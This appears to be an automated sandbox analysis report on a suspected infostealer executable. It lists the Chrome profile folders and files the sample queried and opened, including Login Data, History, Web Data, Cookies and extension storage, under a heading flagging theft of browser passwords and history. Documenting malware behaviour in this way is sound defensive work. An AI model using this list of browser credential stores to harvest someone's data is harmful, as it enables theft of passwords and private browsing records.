Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\CommerceHeuristics VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\Temp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\blob_storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\commerce_subscription_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\RecoveryImproved VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\CertificateRevocation VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BudgetDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\commerce_subscription_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\coupon_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\FileTypePolicies VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\FirstPartySetsPreloaded VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Subresource Filter\Unindexed Rules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BudgetDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\PersistentOriginTrials VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SegmentInfoDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SignalDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sessions VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync App Settings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Extension Settings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\Manifest Resources VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\Temp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\blob_storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\commerce_subscription_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\coupon_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\databases VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\optimization_guide_model_metadata_store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\FileTypePolicies VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\MEIPreload VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\OptimizationHints VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\PKIMetadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\SafetyTips VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\TrustTokenKeyCommitments VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\blob_storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BudgetDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\coupon_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SegmentInfoDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SignalDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sessions VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\segmentation_platform VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Subresource Filter VolumeInformationJump to behavior

Stealing of Sensitive Information

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PrivateAggregationJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\MANIFEST-000001Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Gmail.icoJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\YouTube.icoJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Docs.ico.md5Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\MANIFEST-000001Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Trust Tokens-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\CURRENTJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.dbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Gmail.ico.md5Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteData-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\MANIFEST-000001Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.dbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.logJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENTJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENTJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PrivateAggregation-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DIPSJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DIPS-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NELJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
